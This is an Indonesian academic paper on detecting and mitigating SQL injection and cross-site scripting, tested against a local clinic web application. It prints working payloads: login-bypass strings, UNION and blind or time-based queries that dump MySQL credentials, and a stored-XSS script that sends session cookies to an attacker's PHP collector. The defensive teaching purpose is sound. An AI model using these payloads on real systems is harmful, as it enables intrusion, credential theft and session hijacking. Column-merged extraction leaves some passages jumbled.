Seminar Nasional Ilmu Komputer2014 (SNIKOM)

Laguboti, 20 - 24 Agustus 2014

DETEKSI, IDENTIFIKASI DAN PENANGANAN WEB MENGGUNAKAN SQL

INJECTION DAN CROSS-SITE SCRIPTING

Albert Sagala1 Elni Manurung2, Binsar Siahaan3,Rusman Marpaung4

Teknik Komputer, Fakultas Teknik Informatika dan Elektro, Institut Teknologi Del
Jl.Sisimangaraja Desa Sitoluama Kec.Laguboti, Toba Samosir, 22381
Telp : (0632) 331234, Fax : (0632) 331116
E-mail : albert@del.ac.id, if11036@students.del.ac.id, if11009@students.del.ac.id,
if11072@students.del.ac.id

Abstrak
Seiring perkembangan zaman, perkembangan teknologi sangat meningkat yang diikuti dengan perkembangan
permintaan pembangunan web yang digunakan dalam berbagai keperluan seperti pendidikan, bisnis, transaksi
data yang rahasia dan lain sebagainya. Serangan SQL injection dan Cross-Site Scripting adalah dua jenis
serangaan yang paling sering ditemukan dan menghasilkan suatu ancaman yang sangat membahayakan
menurut penelitian OWASP. SQL injection memungkinkan seorang attacker untuk memperoleh data rahasia
dari suatu database. Pada Cross-site scripting, kemampuan social engineering sangat berperan dalam serangan
ini yaitu bagaimana seorang attacker dapat mengambil perhatian dari client untuk mendapatkan informasi yang
rahasia. Selain itu, kedua serangan ini memiliki kesamaan untuk mendapatkan informasi rahasia yang terdapat
di dalam suatu web diantaranya masukan-masukan dari client terhadap form login, url, text field, tag htmln
objek dokumen dan lain sebagainya yang merupakan celah yang mungkin pada web.
Pada paper ini akan dibahas mengenai deteksi, identifikasi dan penanganan terhadap dua jenis serangan
berikut. Pengujian web akan dilakukan pada website Maya Klinik yaitu web yang dibangun oleh tim developer
untuk dilakukan pengujian web menggunakan dua jenis serangan tersebut

Kata Kunci: sql injection, cross-site scripting, web, database, attacker

1. PENDAHULUAN
Gambar 1. Celah Keamanan pada web [1]
1.1 Latar Belakang
Perkembangan internet diikuti dengan pesatnya 1.2 Tujuan
pertumbuhan website pada saat ini. Website Tujuan yang ingin dicapai pada penelitian ini adalah
berperan sebagai media yang banyak digunakan sebagai berikut.
sebagai media pertukaran informasi dan media a. Mendeteksi, mengidentifikasi dan melakukan
transaksi, tetapi masih banyak website tidak penanganan terhadap serangan SQL Injection
memiliki tingkat keamanan yang baik. Ada begitu dan Cross-site scripting
banyak potensi resiko keamanan dalam website yang b. Memberikan saran bagi developer untuk
bisa dimanfaatkan oleh penyerang. Pada Gambar 1, mencegah terjadinya serangan sql injection dan
ditampilkan data tentang sepuluh celah keamanan Cross-site scripting pada website.
yang paling banyak terdapat pada website yang 1.3 Lingkup
dirilis oleh Open Web Application Security Project Lingkup dalam menyelesaikan persoalan
(OWASP). Apabila celah keamanan ini tidak penelitian ini adalah
dideteksi sejak dini, maka bisa menimbulkan 1. Objek yang digunakan adalah website. Website
dampak negatif bagi website yang menjadi target yang digunakan sebagai objek eksperimen adalah
attacker. Faktor lain adanya timbulnya celah website yang sudah ada dibangun sebelumnya.
keamanan adalah kurangnya pengetahuan developer 2. Jenis serangan yang dibahas adalah serangan
atau pengembang tentang pengamanan website yang SQL injection dan cross-site scripting.
dibangun. 3. Bahasa pemrograman yang digunakan adalah
A1-Injection
A6 Sensitive Data PHP (Hypertext Preprocessor).
Exposure
4. DBMS (Database Management System) yang
A2-Broken
Authentication and
session
A7-Missing
Function Level
digunakan adalah MySQL.
management
Acces Control
5. Saran bagi pengembang website untuk mencegah
A3-Cross-Site
Scripting
A8-Cross-Site
Request Forgery
serangan SQL injection dan cross-site scripting
terhadap website.
A9-Using
A4-Insecure Direct
Obje ct Ref erences
Components with
Known
1.4 Related Work
Vulnerabilities
1. Paper “Practical Identification of SQL Injection
A5-Security
Misconfiguration
A10-Unvalidated
Redirects and Vulnerabilities”. Dalam paper ini dijelaskan
Forwards
mengenai pengujian/testing terhadap SQL

hal 1
Seminar Nasional Ilmu Komputer2014 (SNIKOM)
Laguboti, 20 - 24 Agustus 2014
Injection yaitu menggunakan sqlmap dan
OWASP Zed Attack Proxy (ZAP) tools dan
membuat skenario dalam melakukan deteksi
terhadap SQL. Jika pada tugas akhir ini tidak
menggunakan tools untuk mendeteksi adanya
serangan sql injection, pada paper ini untuk
menggunakan tools yang disediakan oleh
Backtrack dan web yang diuji menggunakan
DVWA dan skenario injeksi yang dilakukan pda
HTTP Get Parameter, HTTP POST data dan
manipulasi cookie.[2]
2. Paper “State of the Art: Automated Black-box
Wep Application Vulnerability Testing”.
Paper ini mendeteksi celah-celah pada web
menggunakan automated black-box web
application vulnerability scanners yang akan
menampilkan jenis serangan Cross-Site
Scripting, SQL Injection dan bentuk-bentuk lain
dari Cross-Site Scripting, Information Disclosure
dan paling merata di dalam celah keamanan pada
web. Black-box scanner detection mendeteksi
rate mengenai kelas pada celah-celah web.
Tujuan dari penelitian yang dilakukan yaitu
menemukan celah menggunakan scanner dan
merepresentasikan celah yang ditemukan dengan
menggunakan scanner dan melihat seberapa
efektif penggunaan scanner dan menghasilkan
hasilnya dalam bentuk grafik.[3]
2. DASAR TEORI
Dalam pengembangan sebuah website, sisi
keamanan website menjadi hal penting yang perlu
diperhatikan. Celah keamanan merupakan
kelemahan dalam sebuah website yang
memungkinkan penyerang untuk merusak dan
mengambil keuntungan yang menyebabkan kerugian
bagi pengguna website. Celah keamanan disebabkan
oleh kesalahan desain website atau kesalahan
implementasi. Open Web Security Project
(OWAPS) merilis sepuluh celah keamanan yang
terdapat pada website.
2.1 Structure Query Language (SQL) [4]
Structure Query Language (SQL) merupakan
bahasa pemrograman yang diracang untuk
mengelola data dalam Database Management
System (DBMS). Perintah SQL dapat digunakan
tidak hanya untuk mencari data dan objek pada
database, tetapi juga untuk melakukan berbagai
fungsi lainnya seperti, anda dapat membuat tabel,
menambahkan data ke tabel, atau mengubah data,
menghapus tabel, mengatur hak akses bagi
pengguna. Perintah SQL dikelompokkan menjadi
empat kategori utama yaitu:
1. Data Definition Language (DDL) -
Perintah SQL ini digunakan untuk
membuat, mengubah, dan menghapus
struktur objek Database. Perintah tersebut
diantaranya CREATE, ALTER, DROP,
RENAME, dan TRUNCATE.
2. Data Manipulation Language (DML) -
Perintah SQL ini digunakan untuk
menyimpan, mengambil, mengubah, dan
menghapus data. Perintah-perintah ini
adalah SELECT, INSERT, UPDATE, dan
DELETE.
3. Transaksi Control Language (TCL) -
Perintah SQL ini digunakan untuk
mengelola perubahan yang mempengaruhi
data. Perintah-perintah ini COMMIT,
ROLLBACK, dan SAVEPOINT.
4. Data Control Language (DCL) - Perintah
SQL ini digunakan untuk menyediakan
keamanan untuk objek Database. Perintah-
perintah ini adalah GRANT dan
REVOKE.2.2
2.2 Jenis Serangan SQL Injection
Ada 3 jenis serangan SQL Injection secara umum
yaitu[5]:
1. Classical SQL Injection
Teknik Classical Injection bekerja dengan cara
menggabungkan dua query untuk mendapatkan
informasi tambahan dari tabel tertentu dan membuat
lebih mudah untuk mendapatkan informasi dari
DBMS ( Database Management System). Jenis
serangan menginjeksi sebuah url menggunakan
UNION atau titik koma (“;”).
2. Blind SQL Injection
Seperti teknik classical SQL Injection, blind sql
injection mengijinkan seorang attacker membaca
dan memperoleh data dari database hanya dengan
memasukkan simbol per simbol. Blind SQL Injection
bekerja berdasarkan pernyataan benar atau salah.
Jika sebuah request dieksekusi dan menghasilkan
nilai true, web akan mengembalikan konten tertentu
tetapi jika eksekusi menghasilkan nilai false, akan
mengembalikan konten lain. Dalam beberapa kasus,
Blind SQL Injection dibutuhkan pada saat ketika
aplikasi web menghasilkan pesan error dari DBMS.
3. Double Blind SQL Injection / Time-based
Serangan Double Blind SQL Injection
menggunakan waktu tunda (time delay) pada saat
pemprosesan query SQL. Jika web memiliki celah,
akan mengekseskusi request sesuai dengan
manipulasi url yang dilakukan oleh attacker. Jika
pada sebuah query SQL benar, maka akan
dieksekusi sebanyak N detik, tetapi jika query
dieksekusi dengan segera, maka request yang
diberikan attacker bernilai false.
2.3 Jenis Serangan Cross-Scripting
Berikut adalah jenis serangan cross-site scripting [6].
1. Stored or Persistent XSS
Stored XSS atau yang disebut dengan persistent
XSS adalah ketika seorang attacker menginjeksi
kode berbahaya secara permanen dan disimpan pada
server target seperti pada database.
hal 2
Seminar Nasional Ilmu Komputer2014 (SNIKOM)
Laguboti, 20 - 24 Agustus 2014
Gambar 2. Alur Kerja Stored XSS[7]
2. Reflected or Non-Persistent Cross Site Scripting
Attacks
Reflected Cross Site Scripting adalah tipe serangan
XSS yang paling banyak digunakan dan sering
disebut juga dengan serangan sementara. Dikatakan
sementara ketika kode tidak dapat diinjeksi ke dalam
server, hanya dengan mengirimkan url berbahaya
kepada client. Client akan diarahkan pada website
yang akan mengembalikan serangan ke browser
korban. membuat url seperti web yang sebenarnya.
Ketika pengguna tertipu dan mengeksekusi link
berbahaya, korban akan diarahkan pada website
yang akan mengembalikan serangan ke browser
korban. Browser kemudian akan mengeksekusi kode
karena kode tersebut dianggap berasal dari server
yang terpercaya.
3. DOM Based XSS
DOM dapat didefinisikan sebagai sebuah
specification Application Programming Interface
(API) yang bebas bahasa dan platform. DOM
mendefinisikan struktur logic dokumen serta cara
melakukan manipulasi dan akses terhadap dokumen
tersebut. Pada DOM based XSS, halaman itu sendiri
(HTTP respon) tidak berubah namun kode pada sisi
client yang disertakan pada halaman dieksekusi
dengan cara yang berbeda karena modifikasi
berbahaya yang sebelumnya terjadi pada DOM.
Browser korban mulai memparsing HTML menjadi
DOM. DOM mengandung objek yang dinamakan
dokumen yang mengandung property yang disebut
dengan URL. Property ini ada bersama URL pada
halaman yang sedang dibuka sebagai bagian dari
pembentukan DOM. Ketika parser sampai pada kode
javascript, akan mengeksekusi dan memodifikasi
HTML murni dari page tersebut.
3. PEMBAHASAN
3.1 SQL Injection
Deteksi awal celah keamanan sql injection akan
dilakukan pada web melalui form login atau url-nya.
Akan dideteksi adanya celah terhadap sql injection
dari web yang sangat sederhana baik dari form login
maupun pada url nya.
1. Pada form login, dapat dilakukan dengan
penambahan karakter yang berbahaya sehingga
request dari attacker dieksekusi. Penambahan
karakter-karakter yang berbahaya dapat dimasukkan
ke dalam form login harus memperhatikan
pengambilan query untuk menginjeksi form login-
nya. Ketika masukan itu tidak dapat menginjeksi
form login, maka akan menggunakan cara lain untuk
memperoleh hak akses untuk memasukinya
diantaranya memasukkan masukan pada username
dan password berupa ‘ or 1=1, maka pesan error
akan ditampilkan seperti di bawah ini.
Error Found : You have an error in your SQL syntax;
check the manual that corresponds to your MySQL
server version for the right syntax to use near '' and
Password='8fca94dd0fc8bf43b322dca33f5edd4c'' at
line 3
Dari pesan error ini, seorang attacker dapat
mengetahui bahwa web dapat diinjeksi melalui
serangan sql injection dan diketahui juga jika web
menggunakan MD5 dikarenakan hashing password
di dalam database di-hash menggunakan MD5.
Pada tabel 1, masukan manipulasi url pada form
login pada semua role yang dimiliki web Maya
Klinik[8].
Tabel 1. Masukan pada form login pada web
Klinik
Masukan Aksi Role
' OR 1=1 LIMIT 1 -- # Berhasil Owner
' OR 1=1 ORDER BY 1 Berhasil Apoteker
ASC LIMIT 1,1 --
' or 1=1 ORDER BY 1 Berhasil Dokter
DESC LIMIT 1,1 -- #
' OR 1=1 ORDER BY 1 Berhasil Receptionist
DESC LIMIT 5,1 -- #
' OR 1=1 ORDER BY 1 Berhasil Kasir
DESC LIMIT 2,1 -- #
2. Pada url, dapat dilakukan analisis dengan
melihat url di web browser. Secara umum, url di
suatu web menampilkan informasi yang terdapat di
dalam database apakah itu numeric maupun kata.
Misalnya ketika kita melihat suatu berita terkini,
kemudian pada url di web browser akan ditampilkan
berita_id = 21. Pendeteksian awal tersebut kemudian
akan dilanjutkan dengan menambahkan karakter-
karakter yang berbahaya seperti single quote, double
quote, comment, tautology dan lain sebagainya.
Ketika karakter-karakter yang berbahaya
dimasukkan, akan menampilkan respon kepada
attacker. Di bawah ini adalah salah satu url yang
dimiliki oleh web Maya Klinik :
http://localhost/proyek/Aplicatio
n/medicalrecord.php?act=detail&me
dicalRecordID=MR00000016
Deteksi pada web menggunakan SQL Injectison
dalam mencari celah suatu url diantaranya :
- Menambahkan single quote untuk menemukan
pesan error. Menambahkan double minus (--) pada
akhir url dikarenakan memungkinkan terdapat
statement lanjutan di belakang query. Contoh:
pada url di atas dapat dibayangkan query untuk
menampilkan data tersebut yaitu select pasien
from MR0000016 and obat=’kapsul’.Maka untuk
mencari celah keamanan digunakan gabungan
single quote dan double minus untuk memisahkan
tanda single quote yang digunakan pada query
yaitu : select pasien from patient where id =
‘MR016’-- # ‘. Dilakukan pengujian sehingga web
menghasilkan nilai true, sehingga url yang dapat
diinjeksi menjadi menghasilkan true or false.
Ketika url tersebut dijalankan akan menampilkan
konten dari web tersebut seperti pada gambar 6 di
bawah ini.
hal 3
Seminar Nasional Ilmu Komputer2014 (SNIKOM)
Laguboti, 20 - 24 Agustus 2014
http://localhost/proyek/Aplication/medicalrecord.php
?act=detail&medicalRecordID=MR00000016’ -- #
- Terdapat beberapa query di tampilan tersebut yaitu
data pasien dan data medical record history.
Ketika dilakukan injeksi terhadap url tersebut
dalam menentukan jumlah tabel yang digunakan
dan query yang memiliki prioritas yang utama.
Karena setiap query memiliki jumlah kolom yang
berbeda. Ketika telah didapat query yang tepat
untuk diinjeksi, maka dilakukan skenario dalam
melakukan injeksi terhadap url dengan
menyisipkan di salah satu kolom.
Gambar 3. Tampilan Url
Ketika deteksi sudah dilakukan dan menemukan
celah keamanan pada web itu, kakas dapat dilakukan
untuk identifikasi jenis serangan yang akan
digunakan. Pada percobaan ini, akan digunakan
semua jenis serangan SQL Injection. Tidak semua
web dapat menggunakan 3 serangan SQL Injection,
bergantung pada respon yang diberikan pada web.
1. Metode Classical SQL Injection
Berikut adalah manipulasi url untuk mengetahui
username dan password yang terdapat di dalam
database Maya Klinik
http://localhost/proyek/Aplication/med
icalrecord.php?act=detail&medicalRecor
dID=MR00000016' union select
group_concat(user,password),2,3,4,5,6,
7,8 from mysql.user limit 1,1 -- #
Ketika url dijalankan, maka akan menghasilkan
tampilan seperti pada gambar4.
Gambar 4.Tampilan Hasil Eksekusi
Manipulasi Url
Kemudian, untuk melakukan crack pada password,
menggunakan hash online seperti pada gambar 5 di
bawah ini dan setelah dilakukan crack pada
database, maka aplikasi web sudah berada seutuhnya
pada attacker.
Gambar 5. Hasil Crack Password
Menggunakan Hash Online
2. Metode Blind SQL Injection
Blind SQL Injection dapat diuji pada web 2
dikarenakan pada saat memasukkan masukan berupa
and 1=1 untuk menguji respon dari web apakah
Ketika menambahkan and 1=0 pada akhir dari url,
maka akan menampilkan respon false yaitu tidak
menampilkan konten dari web.
Gambar 6. Respon false pada manipulasi url
Untuk mengetahui username dari database
menggunakan jenis serangan ini, maka dilakukan
http://localhost/proyek/Aplication/medic
dengan menebak bilangan ASCII per karakter.
alrecord.php?act=detail&medicalRecordID=
Ketika nilai ASCII
MR00000016' yang--diuji
AND 1=1 # menghasilkan nilai
true, maka akan menghasilkan tampilan web yang
sebenarnya. Ketika nilai ASCII yang diuji adalah
false, tidak menghasilkan tampilan yang sebenarnya
seperti pada gambar 6.
http://localhost/proyek/Aplication/med
icalrecord.php?act=detail&medicalRecor
dID=MR00000016' and
mid(user(),1,14)=char(82,79,79,84,64,7
6,79,67,65,76,72,79,83,84) --#
3. Metode Double Blind SQL Injection
Serangan ini dilakukan ketika manipulasi url yang
dilakukan berhasil tetapi dapat ditangani di dalam
database, tetapi pada attacker, hasil manipulasi tidak
terlihat, maka tidak menutup kemungkinan jika web
ini memiliki celah SQL Injection. Pada manipulasi
url di bawah, jika username password itu adalah
berupa nilai ASCII tersebut, maka lakukan delay
selama 5 detik. Jika eksekusi manipulasi url tersebut
kurang dari 5 detik, maka username yang diuji
bernilai salah.
http://localhost/proyek/Aplication/medi
calrecord.php?act=detail&medicalRecordI
D=MR00000016' union select
1,2,3,4,5,6,7,
if((mid(user(),1,14)=char(82,79,79,84,6
4,76,79,67,65,76,72,79,83,84)),sleep(5)
,1 ) order by 1 asc limit 1,1 -- #
Akan dilakukan pengujian pada database dengan
memasukkan query pada kode program, hasil
eksekusi akan ditampilkan pada gambar 6.
Gambar 7. Hasil Eksekusi di database
hal 4
Seminar Nasional Ilmu Komputer2014 (SNIKOM)
Laguboti, 20 - 24 Agustus 2014
Penanganan yang dilakukan pada pengujian web
dilakukan pada form login dan pada url.
Berikut penanganan yang dilakukan terhadap celah
keamanan tersebut antara lain:
1. Menggunakan fungsi Absolut
Menggunakan fungsi absolute dengan membuat id
menjadi absolut integer dengan cara mengubah kode
program $id=$_GET[‘id’] menjadi
$id=abs((int)$_GET['id']) . Dalam kode program
yang diperbaiki, fungsi abs() digunakan untuk
membuat id selalu bernilai positif dan pada kode
program tersebut dilakukan casting untuk mengubah
tipe data menjadi tipe integer.
2. Menggunakan mysql_real_escape_string.
Pada kode sebelumnya $id= $_GET[‘id’];
diubah menjadi id=$_GET[‘id’];
3. Menggunakan fungsi is_numeric
Melakukan pengecekan apakah nilai yang ada pada
parameter id bernilai integer dengan menambahkan
kode program berikut.
$id = $_GET[‘id’];
if(is_numeric($id)){
//query dijalankan dan aksi selanjutnya
}else{ // berikan aksi}
4. Membuat Fungsi
Fungsi untuk menghapus karakter berbahaya yang
dimasukkan dan data berbahaya yang dimasukkan
ke dalam aplikasi web tersebut akan ditangani di
dalam aplikasi itu sendiri dan kata berbahaya seperti
UNION, SELECT yang disisipkan tidak akan
dieksekusi dan menjadi suatu string biasa.
function removemaliciouschar($s)
{
return
str_replace(array("&","<",">","/","\
\",'"',"'","?","+",";","*","-
","#"),'',$s);
} injeksi script kepada sebuah website dinamis. Web
3.2 Cross-site Scripting
Pendeteksian awal celah keamanan menggunakan
cross-site scripting dilakukan pada web. Deteksi
adanya celah pada cross-site scripting dilakukan
pada url dan field yang menyediakan masukan bagi
attacker dan memungkinkan menjadi celah
keamanan untuk dilakukan eksploitasi menggunakan
cross-site scripting. Pada field tersebut, attacker
memasukkan tag html maupun javascript yang
berbahaya. Berikut adalah field masukan data diri
pasien pada web MayaKlinik. Data diri pasien
dimasukkan oleh receptionist ke aplikasi mayaklinik
melalui field pada aplikasi. Receptionist berperan
untuk mengentri data dan keluhan dari pasien.
Sedangkan hak akses yang terdapat di dalam aplikasi
yaitu membaca, menulis dan melakukan perubahan
data pasien. Seluruh pengguna aplikasi mayaklinik
dapat mengakses data pasien kecuali apoteker.
Berikut adalah tampilan field tambah pasien pada
aplikasi.
Gambar 8. Tampilan Masukan Data diri
Pasien
Deteksi dilakukan dengan menyertakan tag html
ataupun javascript ke dalam aplikasi melalui field
nama, alamat, kota dan keluhan. Field nomor
telepon tidak menjadi bahan pengujian karena hanya
menerima format data number. Tag html yang
digunakan pada pengujian adalah tag <b>.
Pada field masukkan data pasien field yang
berpotensi memiliki celah keamanan Cross-Site
Scripting adalah sebagai berikut.
Tabel 2. Masukan Berpotensi XSS
Nama Field Celah XSS
Nama

Alamat

Kota

No Telepon -
Keluhan

Hasil tampilan pada aplikasi ditunjukkan pada
gambar 9.
Gambar 9. Hasil Eksekusi XSS
Terdapat tiga tipe serangan cross-site-scripting
yang digunakan oleh penyerang dalam melakukan
simulasi yang digunakan untuk menunjukkan
bagaimana XSS itu bekerja pada web yang memiliki
celah terhadap serangan XSS dan bagaimana XSS
itu tidak bekerja pada web dimana kode programnya
telah diamankan. Web simulasi yang menggunakan
CMS tersebut akan menerapkan semua tipe serangan
XSS.
Ketika celah ditemukan seperti pada gambar 8,
maka diidentifikasi jenis serangan yang akan
digunakan. Pada Maya Klinik, jenis serangan hanya
menggunakan Stored XSS dikarenakan jika script
dari seorang attacker akan dieksekusi langsung pada
database. Stored terjadi pada aplikasi maya klinik
melalui field masukan data basien berupa tag html
maupun javascript
<script>alert("XSS Attack")</script>
Script berikut di injeksikan pada field alamat yang
memiliki panjang data yang lebih dari field lain pada
aplikasi. Berikut adalah tampilan pada aplikasi
hal 5
Seminar Nasional Ilmu Komputer2014 (SNIKOM)
Laguboti, 20 - 24 Agustus 2014
Gambar 10. Tampilan Data Pasien
Ketika akan ditampilkan kembali pada aplikasi,
script dieksekusi oleh aplikasi dan mengubah
perilaku dari aplikasi. Berikut tampilan aplikasi
setelah script dijalankan
Gambar 11. Tampilan Hasil Eksekusi
Menggunakan Stored XSS
- Mencuri cookie Admin oleh Receptionist dengan
Stored Cross-Site Scripting
Pencurian cookie dilakukan oleh receptionist
yang bertindak sebagai penyerang dengan
Admin(owner) sebagai korban. Selanjutnya cookie
Admin yang dicuri oleh receptionist dimamfaatkan
untuk session hijacking yang pada akhirnya
berujung pada login bypass pada aplikasi yang
sedang digunakan oleh owner dengan status log on.
Skenario:
Pada website http://localhost/mayaklinik telah
ditemukan celah keamanan XSS dan website
tersebut diakses oleh beberapa pengguna. Pegguna
aplikasi mayaklinik terdiri dari owner, dokter,
receptionist, kasir dan apoteker. Seluruh pengguna
aplikasi akan dimintai password dan username
ketika akan memasuki aplikasi. Ketika pengguna
aplikasi telah log in, pengguna akan diberikan
session untuk sehingga tetap dikenali sebagai
pengguna yang sedang log in. Receptionist mencari
celah XSS pada aplikasi dan menemukan pada field
input data pasien pada aplikasi. Langkah awal
attacker akan membuat dua file yaitu attack.php dan
result.php. Attack.php akan disimpan dalam server
yang dimiliki oleh attacker dan hasil dari
penyerangan tersebut akan ditampilkan oleh
result.php. di bawah ini dapat dilihat script yang
digunakan oleh attacker untuk mencuri cookie dari
komputer user.
Tabel 3. Kode Program Attack.php
<?php
// Attack.php
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET[c];
$time = date("Y-m-d G:i:s A");
$text="<br><br>".$time."
".$ip."<br><br>User Agent:
".$agent."<br>Referer
:".$referer."<br>Session:
".$data."<br><br><br>";
$file = fopen ('result.php', 'a');
fwrite($file,$text);
fclose($file);
header("Location: http://127.0.0.1");
?>
Di bawah ini akan ditampilkan kode program
result.php
Tabel 4. Kode Program Result.php
<head>
<meta http-equiv="Content-language"
content="it">
<title> Information </title>
</head>
<body color="#FFFFFF">
<p align="center"><font
color="#FF0000">COOKIESStealing</font></
p>
</body>
Setelah menciptakan kedua file tersebut, attacker
akan mencari celah keamanan untuk menyuntikkan
script. Attacker akan menggunakan field input data
pasien yang tidak dilakukan penyaringan tersebut.
<script>document.location=”http:
//localhost/cookie/attack.php?c=
”+document.cookie;</script>
Script akan tersimpan pada database dan dijalankan
setiap kali halaman aplikasi di-load. Session
pengguna akan tersimpan pada file attack.php
berikut adalah pasien dengan injeksi javascript dan
berpotensi dapat mencuri session korban. Pada
result.php akan tampil session korban seperti pada
gambar berikut
Gambar 12. Tampilan Session Pengguna
hal 6
Seminar Nasional Ilmu Komputer2014 (SNIKOM)
Laguboti, 20 - 24 Agustus 2014

Session yang didapat oleh attacker selanjutnya akan
digunakan oleh attacker untuk bypass aplikasi tanpa
menggunakan password dan username selama user
masih aktif dan dalam keadaan login.
Penanganan menggunakan htmlentities()
atau htmlspecialchars() dari PHP. Ketika
fungsi PHP ini diaplikasikan pada data masukan
pengguna, kedua fungsi ini akan mengubah setiap
script atau tag dalam string tersebut menjadi sesuatu
yang string lain yang tidak dapat dieksekusi oleh
browser. Sebagai contoh ketika user memberi
masukan berupa tag HTML dan disaring oleh fungsi
htmlspecialchar(), keluaran aplikasi yang akan
ditampilkan adalah masukan itu sendiri, bukan hasil
eksekusinya. Hasil yang ditampilkan adalah:
site scripting dapat dilakukan dengan
menggunakan htmlspesialchars(),htmlentities()
4.2 Saran
Adapun saran yang diberikan kepada
pengembang aplikasi (developer) adalah sebagai
berikut:
1. Seorang developer dalam membangun aplikasi
berbasis web harus memperhatikan kode
program yang aman sehingga dapat terhindar
dari serangan yang dilakukan oleh attacker.
2. Seorang developer harus memperbaharui
pengetahuannya terutama dalam segi keamanan
sehingga aplikasi web yang dibangun terhindar
dari serangan attacker

PUSTAKA

[1] OWAPS Top 10 – 2013 : The Ten Most Critical

Web ApplicationSecurity Risk,
https://www.owasp.org/index.php/Top_10_2013-
Top_10, diakses pada tanggal 27 Desember 2013
[2] Chad Dougherty, (2012), Practical Identification
Gambar 13. Tampilan Hasil Eksekusi of SQL Injection Vulnerabilities, Carnegie
Penanganan XSS Mellon University”.
[3] Jason Bau, Elie Bursztein, dkk, State of the Art :
Fungsi htmlentities() atau
Automated Black-box Wep Application
htmlspecialchars() berfungsi mengubah spesial
Vulnerability Testing, Standford University.
karakter menjadi kode yang akan diterjemahkan
[4] Ikhsan, Abdul.Modul SQL Menggunakan SQL
ulang dan ditampilkan kembali dalam bentuk awal
Server 2000".
pada halaman web. Fungsi htmlspecialchar()
[5]Evteev, Dmitry.2010.Methods of Quick
mengubah karakter spesial yang dapat digunakan
Exploitation of Blind SQL Injection
dalam serangan XSS, seperti ampersands(&), kutip
[6]YongHaoli.2009.Cross-Site-Scripting(XSS)-
ganda(“), kutip tunggal(‘), lebih kecil dari(<), lebih
Attacking and Defending,Turku University of
besar dari(>) ke dalam kode.
Applied Sciences
[7]http://www.linuxforu.com/2010/09/securing-
4. KESIMPULAN DAN SARAN apache-part-2-xss-Injection, diakses pada tanggal
4.1 Kesimpulan 04 Januari 2014
1. SQL Injection pada web terjadi melalui login
[8]SYP_19, 2008, “Sistem Informasi Klinik
form dan URL maupun form lain yang berkaitan
Menggunakan PHP”, Politeknik Informatika
dengan pengaksesan data dari database. Cross-
Del”.
Site Scripting dapat terjadi melalui URL dan text
field. SQL Injection maupun Cross Site Scripting
terjadi karena tidak dilakukan validasi terhadap
inputan user.
2. Penggunakan jenis serangan pada SQL Injection
dilakukan berdasarkan respon dari web
sedangkan pada Cross-site scripting berdasarkan
pada text field untuk serangan stored, url untuk
reflected yaitu dengan mengubah informasi pada
url, DOM yang pada kode program berisi
javascript yang akan dijalankan pada web
browser yang menyediakan Document Object
Model (DOM)
3. Penanganan SQL injection dapat dilakukan
menggunakan mysql_real_escape_string,
fungsi absolut, fungsi is_numeric yang
disediakan PHP, dan membuat fungsi untuk
menghapus masukan-masukan attacker berupa
karakter yang berbahaya dan penanganan cross-

hal 7